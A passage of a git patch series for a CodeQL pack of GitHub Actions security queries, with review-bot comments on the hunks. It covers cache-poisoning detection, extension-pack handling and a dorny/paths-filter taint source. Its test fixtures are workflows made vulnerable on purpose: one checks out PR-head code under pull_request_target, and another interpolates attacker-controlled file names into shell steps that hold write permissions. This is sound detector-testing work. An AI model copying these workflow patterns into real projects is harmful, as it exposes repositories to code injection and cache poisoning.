+ go-version-file: 'go.mod'
+ cache: true
+ - run: do some go stuff
+
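Review bot: The new `or` branch (`checkout.getAFollowingStep() instanceof PoisonableStep`) cannot produce a result on its own, because the unchanged `select j.getAStep().(CacheWritingStep)` line still demands a `CacheWritingStep` in the job; when only the poisonable-step branch holds there is nothing to cast and the row is dropped. Select an element that exists in both branches, e.g. `select checkout, "Potential cache poisoning on privileged workflow."`, or split the query so each branch reports its own step. None of test5–test7 exercises the second branch alone (all three contain `actions/setup-go`), so the expected output cannot catch this; a fixture with a PR-head checkout followed by a poisonable step and no cache-writing step would.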
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml
new file mode 100644
index 000000000000..d0ff8c180fe2
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml
@@ -0,0 +1,16 @@
+name: Cache Poisoning
+
+on: pull_request_target
+
+jobs:
+ poison:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - uses: actions/setup-go@v2
+ with:
+ go-version-file: 'go.mod'
+ - run: do some go stuff
+
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
index b791a440a6ef..6e0030ad3832 100644
--- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
+++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
@@ -1,3 +1,5 @@
 | .github/workflows/test1.yml:17:9:21:6 | Uses Step | Potential cache poisoning on privileged workflow. |
 | .github/workflows/test2.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. |
 | .github/workflows/test3.yml:12:9:20:6 | Uses Step | Potential cache poisoning on privileged workflow. |
+| .github/workflows/test6.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. |
+| .github/workflows/test7.yml:12:9:15:6 | Uses Step | Potential cache poisoning on privileged workflow. |
From 373e0a278af4bbe7551a271ded09c6e72705ac62 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 6 May 2024 18:36:46 +0200
Subject: [PATCH 235/707] Rename untrusted checkout queries
---
 ...dCheckoutError.ql => PrivilegedUntrustedCheckoutCritical.ql} | 2 +- ...tedCheckoutWarning.ql => PrivilegedUntrustedCheckoutHigh.ql} | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) rename ql/src/Security/CWE-829/{UntrustedCheckoutError.ql => PrivilegedUntrustedCheckoutCritical.ql} (95%) rename ql/src/Security/CWE-829/{UntrustedCheckoutWarning.ql => PrivilegedUntrustedCheckoutHigh.ql} (95%)
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutError.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql
similarity index 95%
rename from ql/src/Security/CWE-829/UntrustedCheckoutError.ql
rename to ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql
index 604acf71cc7b..5c0528c45518 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckoutError.ql
+++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql
@@ -7,7 +7,7 @@
 * @problem.severity error
 * @precision high
 * @security-severity 9.3
- * @id actions/untrusted-checkout
+ * @id actions/privileged-untrusted-checkout/critical
 * @tags actions
 * security
 * external/cwe/cwe-829
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql
similarity index 95%
rename from ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql
rename to ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql
index d8dfd69ad28e..e45075552ab2 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql
+++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql
@@ -7,7 +7,7 @@
 * @problem.severity warning
 * @precision medium
 * @security-severity 5.3
- * @id actions/untrusted-checkout
+ * @id actions/privileged-untrusted-checkout/high
 * @tags actions
 * security
 * external/cwe/cwe-829
From 254664d2747daf4fc1910b33c5cd3cdf2b8627cf Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 6 May 2024 18:39:15 +0200
Subject: [PATCH 236/707] Bump qlpack versions
---
 ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 380cfdbd8583..f07d6c40046c 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
-version: 0.0.20
+version: 0.0.21
 dependencies:
 codeql/util: ^0.2.0
 codeql/yaml: ^0.1.2
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index c5a94e35d4be..13f053a40da4 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: githubsecuritylab/actions-queries
-version: 0.0.20
+version: 0.0.21
 groups:
 - actions
 - queries
From c3c6410a73033d86e2ede33a3cec958d19f29609 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 6 May 2024 20:01:48 +0200
Subject: [PATCH 237/707] Update action.yml
---
 .github/action/dist/index.js | 11 +++-------- .github/action/src/codeql.ts | 13 +++---------- action.yml | 14 +++----------- 3 files changed, 9 insertions(+), 29 deletions(-)
diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js
index 4a60299ef0fe..0911555e292d 100644
--- a/.github/action/dist/index.js
+++ b/.github/action/dist/index.js
@@ -28706,14 +28706,9 @@ async function codeqlDatabaseAnalyze(codeql, database_path) {
 "--output",
 codeql_output,
 ];
- const extPackPath = process.env["EXTPACK_PATH"];
- const extPackName = process.env["EXTPACK_NAME"];
- if (extPackPath !== undefined &&
- extPackName !== undefined &&
- extPackPath !== "" &&
- extPackName !== "") {
- cmd.push("--additional-packs", extPackPath);
- cmd.push("--extension-packs", extPackName);
+ const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"];
+ if (useWorkflowModels !== undefined && useWorkflowModels == "true") {
+ cmd.push("--extension-packs", "local/workflow-models");
 }
 // remote pack or local pack
 if (codeql.pack.startsWith("githubsecuritylab/")) {
diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts
index 842af1c8b177..ea1d731c9357 100644
--- a/.github/action/src/codeql.ts
+++ b/.github/action/src/codeql.ts
@@ -147,16 +147,9 @@ export async function codeqlDatabaseAnalyze(
 codeql_output,
 ];
- const extPackPath = process.env["EXTPACK_PATH"];
- const extPackName = process.env["EXTPACK_NAME"];
- if (
- extPackPath !== undefined &&
- extPackName !== undefined &&
- extPackPath !== "" &&
- extPackName !== ""
- ) {
- cmd.push("--additional-packs", extPackPath);
- cmd.push("--extension-packs", extPackName);
+ const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"];
+ if (useWorkflowModels !== undefined && useWorkflowModels == "true") {
+ cmd.push("--extension-packs", "local/workflow-models");
 }
 // remote pack or local pack
diff --git a/action.yml b/action.yml
index 35c423e103df..24453e893ee2 100644
--- a/action.yml
+++ b/action.yml
@@ -14,12 +14,6 @@ inputs:
 suite:
 description: "CodeQL Suite to run"
 default: "actions-code-scanning"
- workflow-extpack-path:
- description: "Path to Workflow extpack"
- required: false
- workflow-extpack-name:
- description: "Name of the Workflow extpack"
- required: false
 runs:
 using: 'composite'
@@ -27,14 +21,14 @@ runs:
 - name: extpack contents
 shell: bash
 env:
- EXTPACK_PATH: ${{ inputs.workflow-extpack-path }}
- EXTPACK_NAME: ${{ inputs.workflow-extpack-name }}
+ EXTPACK_PATH: /home/runner/.codeql/packages/local/workflow-models/0.0.1
+ EXTPACK_NAME: local/workflow-models
 run: |
 echo "##[group] Workflow Models"
 if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi
 echo "##[endgroup]"
 echo "##[group] QLPack"
- if [ -f $EXTPACK_PATH/qlpack.yml ]; then cat $EXTPACK_PATH/qlpack.yml; fi
+ if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; echo "USE_WORKFLOW_MODELS=true" >> $GITHUB_ENV; fi
 echo "##[endgroup]"
 - name: Scan workflows
@@ -45,7 +39,5 @@ runs:
 INPUT_SOURCE-ROOT: ${{ inputs.source-root }}
 INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }}
 INPUT_SUITE: ${{ inputs.suite }}
- EXTPACK_PATH: ${{ inputs.workflow-extpack-path }}
- EXTPACK_NAME: ${{ inputs.workflow-extpack-name }}
 run: |
 node ${{ github.action_path }}/.github/action/dist/index.js
From 0ea34dfb528c914602c8cdf2adc35768a725a786 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 6 May 2024 22:11:43 +0200
Subject: [PATCH 238/707] Update action.yml
---
 action.yml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-)
diff --git a/action.yml b/action.yml
index 24453e893ee2..151c909fb8be 100644
--- a/action.yml
+++ b/action.yml
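Review bot: `EXTPACK_PATH` becomes the hard-coded absolute path `/home/runner/.codeql/packages/local/workflow-models/0.0.1`, so on a self-hosted runner with another home directory, or once the pack's version moves past `0.0.1`, both `[ -f ... ]` tests fail quietly, `USE_WORKFLOW_MODELS` is never written and the models are silently not used rather than the step failing. Because the runner passes `env:` values literally (no shell expansion), derive the path inside the script and quote the expansions, e.g. `EXTPACK_PATH="${HOME}/.codeql/packages/${EXTPACK_NAME}/0.0.1"` followed by `if [ -f "$EXTPACK_PATH/codeql-pack.yml" ]; then cat "$EXTPACK_PATH/codeql-pack.yml"; echo "USE_WORKFLOW_MODELS=true" >> "$GITHUB_ENV"; fi`, and print a `::warning::` when the pack is absent. How the pack reaches that directory is not shown in this diff, so the version pin may be intentional; a comment saying so would help.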
@@ -14,12 +14,19 @@ inputs:
 suite:
 description: "CodeQL Suite to run"
 default: "actions-code-scanning"
+ packs:
+ description: >-
+ Comma-separated list of packs to run. Reference a pack in the format `scope/name[@version]`. If `version` is not
+ specified, then the latest version of the pack is used. By default, this overrides the same setting in a
+ configuration file; prefix with "+" to use both sets of packs.
+ required: false
 runs:
 using: 'composite'
 steps:
 - name: extpack contents
 shell: bash
+ if: inputs.packs
 env:
 EXTPACK_PATH: /home/runner/.codeql/packages/local/workflow-models/0.0.1
 EXTPACK_NAME: local/workflow-models
@@ -28,7 +35,7 @@ runs:
 if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi
 echo "##[endgroup]"
 echo "##[group] QLPack"
- if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; echo "USE_WORKFLOW_MODELS=true" >> $GITHUB_ENV; fi
+ if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; fi
 echo "##[endgroup]"
 - name: Scan workflows
@@ -39,5 +46,6 @@ runs:
 INPUT_SOURCE-ROOT: ${{ inputs.source-root }}
 INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }}
 INPUT_SUITE: ${{ inputs.suite }}
+ INPUT_PACKS: ${{ inputs.packs }}
 run: |
 node ${{ github.action_path }}/.github/action/dist/index.js
From 1ddfbb05f36adcb32f4415a9a7b9a145edfe2094 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 6 May 2024 22:19:02 +0200
Subject: [PATCH 239/707] Update actions fragment
---
 .github/action/dist/index.js | 6 +++--- .github/action/src/codeql.ts | 9 ++++++--- 2 files changed, 9 insertions(+), 6 deletions(-)
diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js
index 0911555e292d..8ff1e7759d27 100644
--- a/.github/action/dist/index.js
+++ b/.github/action/dist/index.js
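Review bot: The `extpack contents` step is now gated on `if: inputs.packs`, but it still prints the fixed `local/workflow-models` pack named by `EXTPACK_PATH`/`EXTPACK_NAME` whatever value `packs` carries, so for any other pack name it shows an unrelated pack or nothing at all; either derive `EXTPACK_NAME` (and the path) from the input or drop the step now that it no longer sets `USE_WORKFLOW_MODELS`. The new `packs` description also promises behaviour this action does not implement — "overrides the same setting in a configuration file; prefix with "+" to use both sets of packs" — which reads as copied from another action's input; trim it to what the value is used for, e.g. `description: "Comma-separated list of CodeQL extension packs (scope/name[@version]) to load during analysis"`. Where the value ends up is not visible in this commit, so confirm the wording against the analyze command before changing it.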
@@ -28610,6 +28610,7 @@ async function newCodeQL() {
 suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`,
 source_root: core.getInput("source-root"),
 output: core.getInput("sarif"),
+ packs: core.getInput("packs").length > 0 ? core.getInput("packs") : undefined,
 };
 }
 exports.newCodeQL = newCodeQL;
@@ -28706,9 +28707,8 @@ async function codeqlDatabaseAnalyze(codeql, database_path) {
 "--output",
 codeql_output,
 ];
- const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"];
- if (useWorkflowModels !== undefined && useWorkflowModels == "true") {
- cmd.push("--extension-packs", "local/workflow-models");
+ if (codeql.packs !== undefined) {
+ cmd.push("--extension-packs", codeql.packs);
 }
 // remote pack or local pack
 if (codeql.pack.startsWith("githubsecuritylab/")) {
diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts
index ea1d731c9357..76eacd6eb67e 100644
--- a/.github/action/src/codeql.ts
+++ b/.github/action/src/codeql.ts
@@ -18,6 +18,8 @@ export interface CodeQLConfig {
 source_root?: string;
 // The output file for the SARIF file.
 output?: string;
+ // Extension CodeQL packs to use for analysis.
+ packs: string | undefined;
 }
 export async function newCodeQL(): Promise {
@@ -28,6 +30,8 @@ export async function newCodeQL(): Promise {
 suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`,
 source_root: core.getInput("source-root"),
 output: core.getInput("sarif"),
+ packs:
+ core.getInput("packs").length > 0 ? core.getInput("packs") : undefined,
 };
 }
@@ -147,9 +151,8 @@ export async function codeqlDatabaseAnalyze(
 codeql_output,
 ];
- const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"];
- if (useWorkflowModels !== undefined && useWorkflowModels == "true") {
- cmd.push("--extension-packs", "local/workflow-models");
+ if (codeql.packs !== undefined) {
+ cmd.push("--extension-packs", codeql.packs);
 }
 // remote pack or local pack
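Review bot: The new `packs: string | undefined;` member of `CodeQLConfig` is declared as a required property, while the neighbouring `source_root?: string;` and `output?: string;` use optional syntax, so every object literal of this type must now spell out `packs` even when it has nothing to say; `packs?: string;` keeps the same runtime meaning and matches the interface's existing style. In `newCodeQL` the assignment can then read the input once, `packs: core.getInput("packs") || undefined,`, instead of calling `core.getInput("packs")` twice. The `dist/index.js` hunks are build output and should be regenerated from the source rather than reviewed on their own.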
From ddf4bb194ef1562a45ad17d5a1066f88021f23c3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 6 May 2024 23:32:06 +0200
Subject: [PATCH 240/707] Fix incorrect source for dorny path filters
---
 .../codeql/actions/dataflow/FlowSources.qll | 17 ++++- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 20 ++++++ ql/lib/ext/dorny_paths-filter.model.yml | 6 -- ql/test/library-tests/test.expected | 1 - .../CWE-094/.github/workflows/test2.yml | 64 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 6 ++ .../CWE-094/PrivilegedCodeInjection.expected | 8 +++ 7 files changed, 114 insertions(+), 8 deletions(-) delete mode 100644 ql/lib/ext/dorny_paths-filter.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index 580fb1d25ab1..db111b9e1900 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -252,10 +252,25 @@ class CompositeActionInputSource extends RemoteFlowSource {
 }
 /**
- * A downloadeded artifact.
+ * A downloaded artifact.
 */
 private class ArtifactSource extends RemoteFlowSource {
 ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep }
 override string getSourceType() { result = "artifact" }
 }
+
+/**
+ * A list of file names returned by dorny/paths-filter.
+ */
+private class DornyPathsFilterSource extends RemoteFlowSource {
+ DornyPathsFilterSource() {
+ exists(UsesStep u |
+ u.getCallee() = "dorny/paths-filter" and
+ u.getArgument("list-files") = ["csv", "json"] and
+ this.asExpr() = u
+ )
+ }
+
+ override string getSourceType() { result = "filename" }
+}
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
index b24f9484a80e..32c329d8c67c 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
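Review bot: Limiting `DornyPathsFilterSource` to `list-files: csv` or `json` is only sound when every sink the value reaches is a shell `run:` step: the `shell` and `escape` modes quote file names for bash, which does not make them safe once the `*_files` output is interpolated into an `if:` expression, an action `with:` input, or a `github-script` body. If the code-injection queries include such non-shell sinks (not visible from this hunk), the mode filter belongs in a sink-aware sanitizer rather than in the source definition, so `shell`/`escape` outputs still flow to non-shell sinks. At minimum, a comment above the `getArgument("list-files")` line should record the assumption, e.g. `// shell/escape modes quote for bash only; treated as safe on the assumption that the value ends in a run: step`.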
@@ -124,3 +124,23 @@ class ArtifactDownloadToUseTaintStep extends AdditionalTaintStep {
 artifactDownloadToUseStep(node1, node2)
 }
 }
+
+/**
+ * A read of the _files field of the dorny/paths-filter action.
+ */
+predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(UsesStep u, StepsExpression o |
+ u.getCallee() = "dorny/paths-filter" and
+ u.getArgument("list-files") = ["csv", "json"] and
+ u = pred.asExpr() and
+ o.getStepId() = u.getId() and
+ o.getFieldName().matches("%_files") and
+ succ.asExpr() = o
+ )
+}
+
+class DornyPathsFilterTaintStep extends AdditionalTaintStep {
+ override predicate step(DataFlow::Node node1, DataFlow::Node node2) {
+ dornyPathsFilterTaintStep(node1, node2)
+ }
+}
diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml
deleted file mode 100644
index 79621a6a30c6..000000000000
--- a/ql/lib/ext/dorny_paths-filter.model.yml
+++ /dev/null
@@ -1,6 +0,0 @@
-extensions:
- - addsTo:
- pack: githubsecuritylab/actions-all
- extensible: sourceModel
- data:
- - ["dorny/paths-filter", "*", "output.changes", "filename", "manual"]
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected
index 5bd009b31b0f..d7f944c5a3dc 100644
--- a/ql/test/library-tests/test.expected
+++ b/ql/test/library-tests/test.expected
@@ -438,7 +438,6 @@ sources
 | amannn/action-semantic-pull-request | * | output.error_message | text | manual |
 | cypress-io/github-action | * | env.GH_BRANCH | branch | manual |
 | dawidd6/action-download-artifact | * | output.artifacts | artifact | manual |
-| dorny/paths-filter | * | output.changes | filename | manual |
 | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual |
 | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual |
 | googlecloudplatform/magic-modules | * | output.changed-files | filename | manual |
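Review bot: `dornyPathsFilterTaintStep` ties the `StepsExpression` to the `UsesStep` by `o.getStepId() = u.getId()` alone; step ids are only unique within a job, so a `steps.changed.outputs.locale_files` read in a different job (or a different workflow in the same database) that happens to have a step with id `changed` is tainted by the wrong step. Add a same-scope constraint next to the id comparison, e.g. `o.getEnclosingJob() = u.getEnclosingJob() and` — or whichever accessor the AST exposes for the enclosing job, which is not visible here. Dropping the old `output.changes` model is right, since that output lists filter names rather than file names, and the `matches("%_files")` test captures exactly the per-filter file lists.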
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml
new file mode 100644
index 000000000000..03ee63fe9cf4
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml
@@ -0,0 +1,64 @@
+name: List files
+
+on:
+ pull_request_target:
+ types: [ opened, synchronize, workflow_dispatch]
+
+permissions: {}
+jobs:
+ test:
+ permissions:
+ contents: write
+ pull-requests: write
+ runs-on: ubuntu-latest
+ env:
+ GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}"
+ steps:
+ - name: Check for relevant changes
+ uses: dorny/paths-filter@v3
+ id: changed
+ with:
+ list-files: json
+ filters: |
+ locale:
+ - '*.xml'
+ - name: Changed files 1
+ run: |
+ echo changed: ${{ steps.changed.outputs.locale_files }}
+ echo changed: ${{ steps.changed.outputs.changes }}
+ - name: Check for relevant changes
+ uses: dorny/paths-filter@v3
+ id: changed2
+ with:
+ list-files: csv
+ filters: |
+ locale:
+ - '*.xml'
+ - name: Changed files 2
+ run: |
+ echo changed:${{ steps.changed2.outputs.locale_files }}
+ echo changed: ${{ steps.changed2.outputs.changes }}
+ - name: Check for relevant changes
+ uses: dorny/paths-filter@v3
+ id: changed3
+ with:
+ list-files: shell
+ filters: |
+ locale:
+ - '*.xml'
+ - name: Changed files 3
+ run: |
+ echo changed:${{ steps.changed3.outputs.locale_files }}
+ echo changed: ${{ steps.changed3.outputs.changes }}
+ - name: Check for relevant changes
+ uses: dorny/paths-filter@v3
+ id: changed4
+ with:
+ list-files: escape
+ filters: |
+ locale:
+ - '*.xml'
+ - name: Changed files 4
+ run: |
+ echo changed:${{ steps.changed4.outputs.locale_files }}
+ echo changed: ${{ steps.changed4.outputs.changes }}
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected
index 50cb0c40d24a..e220d368b20b 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -55,6 +55,8 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | 
@@ -210,6 +212,10 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | semmle.label | Uses Step: changed | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 9068ef92715c..1c4ab8a61cf4 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -55,6 +55,8 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | 
@@ -210,6 +212,10 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | semmle.label | Uses Step: changed | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -319,6 +325,8 @@ subpaths | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. 
